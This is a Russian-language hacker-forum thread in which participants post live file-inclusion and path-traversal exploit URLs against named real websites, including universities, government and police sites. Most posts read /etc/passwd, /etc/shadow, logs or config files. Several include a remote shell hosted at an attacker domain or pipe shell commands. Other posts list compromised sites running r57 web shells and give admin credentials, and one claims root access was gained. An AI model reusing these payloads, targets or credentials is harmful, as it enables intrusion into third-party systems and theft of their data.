XSS, SQL inj нашел, а вот инклудинга в упор не вижу...
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd

Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.

+Постим только:
+php/perl/jsp иньекции.
+Исполнение произвольного кода.
+Исполнение произвольных команд.

+Статья php injection(http://forum.antichat (threadedpost345920.html#post345920).ru/thread12123.html).

+За флуд буду строго наказывать.
+Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут (http://forum.antichat.ru/thread24973.html)(http://forum.antichat.ru/thread24973.html).

При удаленных инклудах

Постим так:
http://site.com/index.php?page=[url]

http://www.giga-hamburg.de/index.php?file=../../../../../../../../../../../../../etc/passwd&folder=giga
запостю, только чёт я не уверен что будет такая же активность.

http://primotechnology.com/index.php?art=../../../../../etc/passwd
уже 210 просомтоов топика..

Порадовало :D
http://www.jff.org/download.php?file=../../../../../../etc/passwd - сохраняем и открываем

http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем

http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd

Удаленный инклуд:

http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?

Немного оффтоп, стало сейчас интересно, всё ли еще можно что-то найти в гугле по запросу "r57shell - http-shell by RST/GHC":

http://www.aodaitimhue.com/nhacrock/info.php
http://www.shp-berlin.de/en/expertise.php
http://www.auschwitzdanceparty.org/conf/r57.php
http://live8x.com/images/kol.php
http://www.securitysafetysystems.com/includes/mysqlconfig.local.php
http://www.huyhoangkontum.org/h.php
http://www.sniperfoxselacome.com/index.php
http://www.hostingstar.us/rapid/ab.php
http://www.aongtr.ro/g.php
http://wwwreal-estate.com/rel-estate-info/wp-commentsrs.php

http://www.webcreativestudio.com/?id=inter&param=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd

И просматриваем в исходном тексте =)

http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем

http://www.paru.cas.cz/index.php?file=../../../../../etc/passwd

http://www.lisboncouncil.net/force-download.php?file=/../../../../../../etc/passwd
сохраняем как passwd.txt и открываем

http://www.evolutionbook.com/eBook/Download.php?file=../../../../../../etc/passwd
сохраняем как passwd.txt и открываем

http://www.njff.no/index.php?file=../../../../../etc/passwd

http://adee.dental.tcd.ie/index.php?file=../../../../../../etc/passwd
:D

http://www.planet-travel.ru/index.php?file=../../../../../../../etc/passwd
0o

Так Хорошо одобряю пока данную активность.

http://robo-host.ru/bill/index.php?lang=../../../../../../../../../../../../../etc/passwd%00

Обновленны правила темы. (http://forum.antichat.ru/showpost.php?p=343192&postcount=2)

http://www.tinform.ru/price.php?file=../../../../../etc/passwd
хотел у них акустику прикупить, передумал =)

http://inet-sell.de/shop/catalog/elmar_start.php?file=../../../../../../../../etc/passwd

Держите :
http://www.fz-juelich.de/portal/index.php?path=../../../../../../etc/passwd
Скоро ещё будет :) :)

Смеялсо :D
http://www.uploadpics.net/source.php?file=../../../../../../etc/passwd

melosi.it
http://www.melosi.it/script/source.php?FILE=../../../../../../etc/passwd

Вот здесь дофига всего :)
http://www.foundationsofhope.com/modules.php?op=modload&name=phpbb2&file=../../../../../../../../../etc/passwd

И тут немного
http://michaelsleman.com/projects/php/index.php?file=../../../../../../etc/passwd

Вот ещё =)
http://www.mmon.org/view.php?file=../../../../../../../etc/passwd

http://www.sakhiepi.ru/news/view_article.php?num=/etc/passwd
=)

http://www.stumbleupon.com/etc/passwd
http://cvsweb.csociety.org/cgi-bin/cvsweb/etc/passwd?rev=1.3

http://www.bookladder.com/viewpage.php?file=../../../etc/passwd

Вот и моя первая ;)
Огромный файл:

http://blog.tice.de/beitrag.php?file=../.. /../../../../etc/passwd

И сразу вторая ;)

http://www.mcxapc.org/static.php?file=../../.. /../../../etc/passwd

Не забываем про пробелы!

Ух, что я нашёл!
www.cs.wright.edu

http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/Password/etc-passwd.txt
Правдо это не php-inj =)

Welcome to Taverna 1.5.1
http://taverna.sourceforge.net/index.php?doc=../../../../../../../etc/passwd
:) :)

На сегодня закончу с PHP inj :)

интересная тема

удаленный инклуд =)
http://www.oscar.com.ua/index.php?action=[url]
инклуд шелла c99
ps: etc/passwd большой :)

http://uw-gezondheid.nl/Producten/aloe.php?inc=http://attack.jino-net.ru/shell.txt
http://www.haus-bei-berlin.de/index.php?cont=http://attack.jino-net.ru/shell.txt?
http://www.mlodzi.org.pl/index.php?file=/etc/passwd
http://www.imperioargentino.com.ar/superseinfeld/index.php?cont=http://attack.jino-net.ru/shell.txt?
http://www.blumenmock.de/hauptt.php?incl=http://attack.jino-net.ru/shell?
http://iaald.org/cee/index.php?page=http://attack.jino-net.ru/shell?
http://www.openworld.ru/school/m.cgi?f=../../../../../../../../../../../../../etc/passwd
http://132.229.155.188/DBWP/index.php?file=../../../../../../../../../../../../../etc/passwd&menu=no
http://www.njff.no/index.php?file=../../../../../../../../../../../../../../../../etc/passwd&object_id=32655
http://www.paru.cas.cz/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.slope.org/archive/issue18/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../../../../../../etc/passwd&knap=6
http://dbis.informatik.uni-freiburg.de/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://my.pchome.net/help/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.photo-forum.fr/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.sphaerentor.com/tolkien/index.php?file=/etc/passwd
http://sognogfjordane.njff.no/index.php?file=../../../../../../../../../../../../../../../../etc/passwd&nav_expand=1328&oid=1328&&expand
http://www.infocentrum.opava.cz/index2.php?file=http://attack.jino-net.ru/shell.txt?
мой мини-вклад

http://www.ufw.org/_page.php?inc=../../../../../../../etc/passwd
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../etc/passwd
http://www.5nr.org/topside/profiles.php?inc=../../../../../../etc/passwd
http://www.venturesnowboards.com/index.php?inc=../../../../../../../../etc/passwd
http://www.rtvpink.com/tvlica/tvlica.php?inc=../../../../../../etc/passwd
http://www.dogbrothers.com/wrapper.php?file=../../../../../../etc/passwd
http://www.neuvm.org/include.php?include=../../../../../../etc/passwd
http://www.printgroupusa.com/index.php?include=../../../../../../etc/passwd
http://www.spa-nyc.com/custompage.php?include=../../../../../../etc/passwd


Это всё :)

http://www.vdgb.ru/?action=../../../../../../etc/passwd/

http://reloadcms.com/main/?module=../../../../etc/passwd
http://wwwisis.ufg.edu.sv/wwwisis/cgi-bin/Nadqs2.cgi?pagina=../../../../../../../../../../../../bin/ls%20-la|
http://bioweb.franko.lviv.ua/biophys/index.php?lang=ua&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpass wd
http://bioweb.franko.lviv.ua/biophys/index.php?lang=ua&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshad ow
http://www.totalpconline.com/taginspectoraddin/?page=../../../../etc/passwd
http://www.greenvilleumc.org/contact/index.php?page=../../../../etc/passwd
http://www.gfrlaw.com/recruiting/index.cgi?file=|cat%20../../../../etc/passwd|
http://www.bookladder.com/viewpage.php?file=../../../../../../../../etc/passwd
http://www.user.tcp.de/viewpage.php?file=../../../../../../../../etc/passwd
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
http://forum-niederrhein.de/forum/cgi-bin/wps/xtra.cgi?filename=../../../../../../../../../etc/passwd
http://trichotomy.ca/cgi-bin/printcode.pl?filename=../../../../../../../../../etc/passwd
http://itsuji.net/brushes/index.php?x=../../../../etc/passwd
инклуды еще в моде!

При удаленных инклудах

Постим так:
http://site.com/index.php?page=[url]

Локальные инклуды
http://www.weng.at/kirchenwirt/index.php?incl=../../../../../../etc/passwd
http://www.ktgracing.nl/uitslagen/index.php?incl=../../../../../../../etc/passwd
http://www.mdarui.com/index.php?incl=../../../../../../etc/passwd


Самая простая статья по PHP inj здесь - http://forum.antichat.ru/thread12123.html. Спс грин биру :)

http://www.reichenthal.at/pages/service-include.php?incl=../../../../etc/passwd
Вроде не было... Надо задуматься уже о написании АнтиБаяна.

Удалённый инклуд (вроди бы :) )

http://www.digital-imogen.net/index.php?href=[url]

И ещё раз локальный
http://www.gck.geoid.de/table.php?href=../../../../../../etc/passwd
http://www.offinet.com/info/help/multiview.php?href=../../../../../../etc/passwd

Удалённый инклуд (вроди бы )
в сорце:
<frame src="тут адрес" name="mainFrame">
просто вставка фрейма с твоим адресом, не иньекция


http://pythonlib.pergamen.hu/examples/index.php?p=../../../../../../etc/passwd

Локальные инклуды
http://www.ies.krakow.pl/fei/index.php?link=../../../../../../etc/passwd
http://www.zebis.ch/zebis5_kantone/schwyz/ictschwyz/drucken.php?link=../../../../../../etc/passwd
http://www.kusat.com/print.php?path=../../../../../../etc/passwd

http://oechorus.org/index.php3?incl=/etc/passwd
http://www.teckel-rueden.de/main.php3?main=/etc/passwd

Немного не PHP Injection, но бага
http://bbc.nvg.org/dir.php3?dir=../../../../../../etc/
Локальные инклуды (Здесь мноооого чего):
http://www.mega-jobs.de/1k_links.php3?include=../../../../../../etc/passwd
http://www.planetdave.com/layout.php3?include=../../../../../../etc/passwd
http://nerdbynature.de/bits/phpcksec/phpcksec.php?path=../../../../../../etc/passwd
http://elib.batol.net/incpag.php?incpag=bbsanc.php3&path=../../../../../../etc/passwd
http://www.wdkx.com/index.php3?path=../../../../../../etc/passwd
http://www.c2p2online.com/main.php3?inc=../../../../../../etc/passwd
http://www.redcrossnca.org/Online/view.php3?file=../../../../../../etc/passwd
http://www.posaunenwerk-ekhn.de/include/diashow.php3?file=../../../../../../etc/passwd

Для тех, кто знает китайский, удалённый инклуд:
http://elib.batol.net/incpag.php?incpag=[url]

Локальные:
http://mg25.com/index.php?HT=../../../../../../etc/passwd
http://www.diabetes-india.com/template.php?incfile=../../../../../../etc/passwd
http://www.karendecoster.com/archive.php?incfile=../../../../../../etc/passwd
http://www.hcc.vic.edu.au/templates/content.php?incfile=/../../../../../../etc/passwd&menu=menu0
http://www.ennear.co.kr/main/normal_form.php?infile=../../../../../../etc/passwd&m_mode=2
http://belrad.paris-minsk.org/index.php?language=0&current_frame=../../../../../../etc/passwd&current_menu=1
http://www.tinguj.net/?p=../../../../../../etc/passwd&fl=1
http://www.ex-light.ru/pages/menu.php?id=../../../../../../etc/passwd
http://www.anciamanovella.com/page.php3?url=../../../../../../etc/passwd
http://www.seeyou.co.jp/pets/subpage.php?incfile=../../../../../../etc/passwd
http://www.autohausbuchmann.de/popups/printMaincontent.php?incfile=../../../../../../etc/passwd
http://www.househype.net/index.php?ht=../../../../../../etc/passwd

Удалённые:
http://www.thaiaudiophile.com/auction.php?incfile=[url]
http://www.heller-kg.de/ref.php?ifile=[url]
http://belrad.paris-minsk.org/index.php?language=0&current_frame=[url]&current_menu=1
http://212.41.0.34/index.php?fl=[url]&part=main
http://www.ex-light.ru/pages/menu.php?id=[url]
http://www.anciamanovella.com/page.php3?url=[url]
http://www.househype.net/index.php?ht=[url]

Было бы иентереснее если при вы давали в инклуде логи как
error_log
access_log
ftp_log
etc....

Следсвенно буду ставить полююсы.
Показывайте что вы не просто банально можете подставить
../../../../../../etc/passwd
Ну а еще понимаете данный вид атаки до конца.

2 [ cash ] - ok
поехали:
http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=1&file=../../../error_log

http://foulard.ece.cornell.edu/index.php?loc=../../../../../etc/passwd
=\

http://www.sembiz.com/index.php?addr=[url]

http://www2.isye.gatech.edu/~jjb/wh/download.php?Down=../../../../../etc/passwd
сохраняем и открываем

http://www.take2games.com/index.php?p=[url]

Локал на .edu
http://cit.geneseo.edu/labs/index.php?pg=../../../../../../etc/passwd

мда... ксс там тоже есть

http://www.clustertech.com.cn/cn/main.php?file=/etc/passwd

http://www.clustertech.com.cn/cn/main.php?file=[any url]

XND IT Security :)

http://xndits.ru/index.php?module=articles&c=../../../../../etc/passwd&b=11&a=13

http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/passwd
http://www.bilug.linux.it/php/out.htm?link=../../../../../../etc/passwd

Вот

http://www.mondocitta.it/home/mondo.php?filename=../../../../../../etc/passwd
Чёто настроения нет :) :)

Ну наконец то PHP-inj! то все скуль да скуль! :) http://www.hclada.ru/turnir11/2005/index.php?c=[url]

http://proficonsult.ru/newsnum.php?num=[url]

http://www.webinfo.pp.ru/rezept/cons/index.php?page=[url]

http://kompressometr.ru/?r=[url]

http://catalog.elra.info/product_info.php?action=download&filename=../../../../../../../../../../etc/passwd

http://www.vdv.crimea.ua/td/show_art.php3?filename=../../../../../../../../../../etc/passwd
http://www.rero.ch/pdfview.php?section=fiche&filename=../../../../../../../../../../etc/passwd

http://www.tranceradio.ch/autohtml.php?filename=../../../../../../../../../../etc/passwd
http://rubyweaver.gilluminate.com/download.php?filename=../../../../../../../../../../etc/passwd

решил я про бильярд почитать)
http://billiard4u.ru/instructions.php?menu=tournament&submenu=../../../../../etc/passwd%00
error_log на уровень ниже, у меня не грузит, но ошибки нет...
остальное не искал
зы: пост-метод катит

www.molrh.dimetra.ru
Сайт о жизни молодежи республики Хакасии.

http://www.molrh.dimetra.ru/mol.php?p=../../../../etc/passwd

http://www.molrh.dimetra.ru/mol.php?p=../../../../etc/syslog.conf

http://www.molrh.dimetra.ru/mol.php?p=../../../../etc/ftpusers

http://www.molrh.dimetra.ru/mol.php?p=../../../../usr/local/etc/proftpd.conf

Админ панель
Админ панель форума
http://www.molrh.dimetra.ru/for/admin/admin.php
***********************************************
login:login
password:pass
***********************************************

Xex
http://www.babyland.sk/kociky-babyland.php?inc=[url]
http://tritonba.grep.sk/default_en.php?url=[url]

http://www.rose-hulman.edu/IAIT/DRC/documentationFiles.php?file=../../../../../../../../../../../../../../etc/passwd

http://www.met.utah.edu/cgi-bin/mace/midcix/midcix.cgi?html=../../../../../../../../../../../../../../../../../../../../../../etc/passwd

http://www.fas.harvard.edu/~semitic/HOAI/adultmain.cgi?article=../../../../../../../../../../../../../../etc/passwd

http://rhino.bocklabs.wisc.edu/cgi-bin/virusworld/htdocs.pl?docname=../../../../../../../../../../../../../../../../../etc/passwd

http://law.marquette.edu/cgi-bin/site.pl?8&template=../../../../../../../../../../../../../../../../etc/passwd

http://campuscgi.princeton.edu/~pucsdt/pucsdtm/getpage.pl?HTMLFILE=../../../../../../../../../../../../../../../etc/passwd

http://lottery.sports.21cn.com/help/index.php?htmlFile=../../../../../../../../../../etc/passwd
http://www.dukesofwindsoar.com/dukes.cgi?do=html&htmlfile=../../../../../../../../../../etc/passwd
http://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../etc/passwd

http://iwa-hwg.eclasses.org/cgi-bin/ql/pullout.cgi?template=../../../../../../../../../../etc/passwd&partner.login=IWA-HWG
http://ecfr.gpoaccess.gov/cgi/t/text/text-idx?c=ecfr&tpl=../../../../../../../../../../etc/passwd
http://www.stumbleupon.com/url/sfgate.com/cgi-bin/article.cgi%3Ff=../../../../../../../../../../etc/passwd

http://www.cyfm.net/article.php?article=../../../../../../../../../../etc/passwd
http://www.whitelandy.de/include.php?file=../../../../../../../../../../etc/passwd
http://www.mpuleg.gov.za/main.php?include=[URL]&menu=_menus/petitions.html

Тоже надо потиху включаться и в эту гильдию :)
http://schwein.ru/news/index.php?page=http://

http://ragingbull.quote.com/mboard/viewrbml.cgi?file=../../../../../../../../../../etc/passwd

первый php-inj

http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd


Берлинская полиция ?


___________
И еще 1 сразу


http://www.neumann.com/download.php?download=../../../../etc/passwd

Удаленный
http://euroinvest-vertrieb.de/include.php?id=17&a=Keine+Ahnung.&game=16&w=1&c=2&ziel=http://rambler.ru

www.clinlab-kafedra.ru
Подготовка специалистов для лабораторной службы России.
.................................................. .....................
http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/hosts

http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/passwd

http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/ftpusers

http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/syslog.conf
*****************************************

Просмотр файлов
http://www.rjkf.ru/forum.php?action=read&name=forum.php&type=m&index=1

:)
http://www.feuerwehr-aachen.de/fws_showfile.php?sfile=[url]

прошолся по пхп-нюку)

www.wolfproject.net/modules/Forums/admin/index.php?phpbb_root_path=[url]
www.packpage.de/modules/Forums/admin/index.php?phpbb_root_path=[url]

че то по кс
http://www.fofg.action-games.de/include.php?file=/etc/passwd

незабываем что кроме etc существует и bin
http://www.nexgen-fs.net/include.php?file=/bin/bash
http://www.nexgen-fs.net/include.php?file=/bin/sh
ну и /etc/passwd
http://www.nexgen-fs.net/include.php?file=/etc/passwd

http://www.thebluetouristmap.com/Browse.php?fileToInclude=[url]
http://www.artgallery.ch/fr/portrait.php?filehtml=[url]
http://www.mozkovna.cz/index.php?OpenPage=[url]
http://www.drysoda.com/holiday.php?page=[url]
Локальные инклуды не рулят.

Первый)

http://www.geneseo.edu/news/nrap.php?pg=../../../../../../etc/passwd

Да ребята, у вас есть чему поучиться.
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/hosts
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/passwd
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/ftpusers
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/syslog.conf

beerbear, Гугл так тесен? Было уже :mad:

http://www.star-corp.de/include.php?file=/etc/passwd
http://www.rwies1406.de/include.php?file=/etc/passwd


Для экстрималов =))
http://www.lu2705.de/include.php?file=/bin/sh

http://www.apsny.ru/history/history.php?page=../forum/
админы жгут.. :)) пасы на рута в 1й из баз пустые.. +)

http://ecsg.free.fr/index.php?page=[локальный]
include ""; =)
http://www.24hoursupport.com/index.php?page=[локальный]
fopen($menu_file_name, "r");

http://lib.nbu.bg/eng/index.php?page=..\..\..\..\boot.ini
виндя ;)

http://www.forestry.caf.wvu.edu/wvu_woodscience/index.php?page=../config.php

http://www.stlouisreview.com/archive/archive.php?page=[локальный]

http://www.bayareabikes.org/btwd/index.php?page=../../../../../../../etc/passwd

http://www.drps.org/template.php?page=/etc/passwd

http://www.myspacegraphicshelper.com/index.php?page=/etc/passwd

http://www.nnhs.net/library/show.php?page=[локальный]
но при желании можно сделать удалённый ;)


http://www.egir.dk/index.php?page=/etc/passwd


Пока всё... скоро будет пополнение.. у мну ещё скулей много :(

всеми любимый дом2, правда только wap пока...

http://wap.dom2.ru/index.php?area=../../../../../../../../../etc/passwd%00

или

http://wap.dom2.ru:81/index.php?area=../../../../../../../../../etc/passwd%00

http://www.33rus.ru/modules/Forums/admin/index.php?phpbb_root_path=[url]?

1.
http://www.hd82.com/hd82/?doc=[url]
2.
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/passwd
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/hosts
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/syslog.conf

http://www.proteger.org.ar/download.php?file=[local]

http://www.starcat-dev.de/display.php?file=24&lan=[сайт]

вместо [сайт] соответственно адрес сайта вида http://site.narod.ru на котором есть шелл с названием shortnews.txt

ЗЫ кстати благодаря этой инъекции я получил root, без использования сплойтов и не расшифровывая хешей

Это не инклуды, это require_once, но разницы походу никакой..
1.
http://www.photoconcept.ch/~scoutsmeyrin/index.php?require=[url]
2.
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/passwd
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/hosts
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/syslog.conf
3.
http://www.pandora-asia.org/panprojects.php?main=[url]
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/passwd
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/hosts
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/syslog.conf

1.
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/passwd
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/hosts
2.
http://www.marionovak.com/proba/include.php?includefile=[url]
3.
http://www.dominoua.com.ua/build.php?file=[url]
4.
http://www.kiyavia.crimea.ua/index.php?[url]

http://www.ssa.ro/domenii/index.php?main=../../../../../../../../etc/passwd

http://www.host-power.de/html/index.php?main=[url]

1.
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/passwd
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/hosts
2. Windows NT.
http://www.uetigers.stier.org/index.php?incpage=[url] (без .php)
3. Linux.
http://sgfma.org/main.php?incfile=[url]
4.
http://www.parentservices.org/content.php?url=../../../../../../etc/syslog.conf
http://www.parentservices.org/content.php?url=../../../../../../etc/hosts
http://www.parentservices.org/content.php?url=../../../../../../etc/passwd
5. Linux.
http://www.soslevasseur.org/event.php?url=[url]

http://simleyvolleyball.com/index.php?main=[url]

бразильский gov...

http://www.tre-to.gov.br/conteudo.php?pg=/etc/passwd

всместо... /etc/passwd можно попробовать подставить урлу шелла, но у меня не получилось, т.к. бразилия и океан между нами... как вариант, можно попробовать шелл с какого нить бразильского сервака, (для новичков: шелл лучше с расширением например txt)...

кста... красиво...
Сегодня 21:36 ответов
от Scipio 100

хз чё за сайт =\

http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../../etc/passwd&knap=6

1.
http://www.business-india.in/articles.php?file=../../../../../etc/passwd
http://www.business-india.in/articles.php?file=../../../../../etc/hosts
http://www.business-india.in/articles.php?file=../../../../../etc/syslog.conf
2.
http://rajbhavan.maharashtra.gov.in/english/news/popupNewsShow1.php?file=/../../../../etc/passwd
http://rajbhavan.maharashtra.gov.in/english/news/popupNewsShow1.php?file=/../../../../etc/hosts
http://rajbhavan.maharashtra.gov.in/english/news/popupNewsShow1.php?file=/../../../../etc/syslog.conf

=\\

http://www.motiveeducation.com/articles.php?file=../../../../../../etc/passwd

http://www.motiveeducation.com/articles.php?file=../../../../../etc/hosts

1. Вроди не выкладовался :)
http://www.cs.utb.edu/main.php?page=../../../../../../etc/passwd
http://www.cs.utb.edu/main.php?page=../../../../../../etc/hosts

=\
http://www.xx.inattack.ru/index.php?page=index.php%00

=\\


http://rr97.weiseware.de/main.php?page=../../../../../../etc/passwd
http://rr97.weiseware.de/main.php?page=../../../../../../etc/hosts
http://rr97.weiseware.de/main.php?page=../../../../../../etc/services
http://rr97.weiseware.de/main.php?page=../../../../../../etc/group



http://www.airtechnical.com/main.php?page=../../../../../../etc/passwd
http://www.airtechnical.com/main.php?page=../../../../../../etc/hosts
http://www.airtechnical.com/main.php?page=../../../../../../etc/group
http://www.airtechnical.com/main.php?page=../../../../../../etc/services

1.
http://www.playnova.eu/iframe.php?include=../../../../../../etc/passwd
http://www.playnova.eu/iframe.php?include=../../../../../../etc/hosts
http://www.playnova.eu/iframe.php?include=../../../../../../etc/services
http://www.playnova.eu/iframe.php?include=../../../../../../etc/group
http://www.playnova.eu/iframe.php?include=../../../../../../var/log/httpd/error_log
http://www.playnova.eu/iframe.php?include=../../../../../../var/log/httpd/access_log (пустой)

2.
http://www.tigra-tuning.eu/main.php?inc=../../../../../../etc/hosts
http://www.tigra-tuning.eu/main.php?inc=../../../../../../etc/services

http://xndcrew.org/index.php?module=../../../../etc/passwd

Вроде не было ещё
http://www.dekoempfer.com/index.php?c=[URL]
и шелл туда уже кто-то залил :) странно в одну только папку куда шелл залит права на запись :)
http://www.dekoempfer.com/activate/web.php
root
own3d

Держите edu

http://www.masferrer.edu.sv/index.php?id=[shell]

http://www.school-izvestia.ru/press-vyp.php?id=2&redir_url=[url]

А вот и красивый .gov


http://www.cso.gov.tr/content.php?id=[shell]

http://xndcrew.org/index.php?module=../../../../etc/passwd
http://xndits.ru/index.php?module=../../../../../etc/passwd&c=tricks вот вдогонку

http://www.trinitysf.org/index.php?bodypage=[url]

=\\


http://www.printgroupusa.com/index.php?include=../../../../../../etc/passwd
http://www.printgroupusa.com/index.php?include=../../../../../../etc/hosts
http://www.printgroupusa.com/index.php?include=../../../../../../etc/group
http://www.printgroupusa.com/index.php?include=../../../../../../etc/services



http://www.sgka.net/rm06/index.php?include=ranglisten&file=./../../../../../../../../etc/passwd
http://www.sgka.net/rm06/index.php?include=ranglisten&file=./../../../../../../../etc/hosts
http://www.sgka.net/rm06/index.php?include=ranglisten&file=./../../../../../../../etc/services
http://www.sgka.net/rm06/index.php?include=ranglisten&file=./../../../../../../../etc/group

=\

http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/passwd%00
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/hosts%00
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/group%00
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/services%00

=\\


http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/passwd
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/hosts
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/group
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/services
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/bash.bashrc
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/networks
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/profile
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/skel/.bashrc



http://www.freiewaehler-mkk.de/index.php?include=../../../../../../etc/passwd&id=17
http://www.freiewaehler-mkk.de/index.php?include=../../../../../../etc/hosts&id=17
http://www.freiewaehler-mkk.de/index.php?include=../../../../../../etc/services&id=17
http://www.freiewaehler-mkk.de/index.php?include=../../../../../../etc/profile&id=17
http://www.freiewaehler-mkk.de/index.php?include=../../../../../../etc/networks&id=17

=\\


http://www.flowforce.com.au/press_releases/index.php?include=../../../../../../../../../../../../etc/passwd%00
http://www.flowforce.com.au/press_releases/index.php?include=../../../../../../../../../../../../etc/hosts%00
http://www.flowforce.com.au/press_releases/index.php?include=../../../../../../../../../../../../etc/group%00
http://www.flowforce.com.au/press_releases/index.php?include=../../../../../../../../../../../../etc/services%00
http://www.flowforce.com.au/press_releases/index.php?include=../../../../../../../../../../../../etc/networks%00
http://www.flowforce.com.au/press_releases/index.php?include=../../../../../../../../../../../../etc/profile%00

http://www.fincert.org/?page=[shell]

http://www.exac.cz/Pinnacle/product2.php?label=PCTV%20Dual%20DVB-T%20Pro%20PCI&soubor=[url]

http://www.mskar.org/atlantis.php?page=[shell]

http://www.capoeirapraha.cz/index.php?zobraz_stranku=[url]

1. Windows NT.
http://www.cbtij.org.br/home.php?page=[url]
2. Х.З. что...
http://www.cineweb.com.br/index_include.php?path=[url]

http://oelsass.free.fr/temp/php/?page=association&nav=[url]

http://www.csss-isla.com/print.php?val1=[url]

http://www.mabe.org/index.php?n=1&c=[url]

http://www.dvbita.com/indexold.php?t=[url]

ну и последняя на сегодня))
http://www.adnanibrahim.net/index_ar.php?nextPage=[url]

Еще edu


http://math.uoregon.edu/photos/index.php?photo=../../../../../../../../../../etc/passwd
http://math.uoregon.edu/photos/index.php?photo=../../../../../../../../../../etc/group
http://math.uoregon.edu/photos/index.php?photo=../../../../../../../../../../etc/hosts

Антибаян http://chingis.pochta.ru/1.txt

Копирайты на продукцию пожалуста =\

http://www.financiallit.org/?page=../../../../../../../../../../../etc/services
http://www.financiallit.org/?page=../../../../../../../../../../../etc/passwd
http://www.financiallit.org/?page=../../../../../../../../../../../etc/group

http://www.sbus.org.br/e_revis/pg01_revista_a.php?[url]

http://www.vcudmurtia.ru/php.php?l=[url]

http://power-soccer.hostarea.org/?page=[shell]

http://www.inomarka54.ru/index2.php?[url]

1. Логов не нашёл :\
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../etc/passwd
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../etc/hosts
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../etc/syslog.conf
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../etc/services
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../etc/group
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../etc/ftpusers

http://www.cimav.edu.mx/posgrado.php?load=../../../../../../../../../../../../../etc/passwd

2.
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../etc/passwd
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../etc/hosts
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../etc/syslog.conf
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../etc/services
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../etc/group
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../etc/ftpusers
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../../../../../../../var/log/httpd/access_log (вроди бы :) )
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../../../../../../../var/log/httpd/error_log (вроди бы :) )

www.yewsoft.com/page.php?includefile=[url]
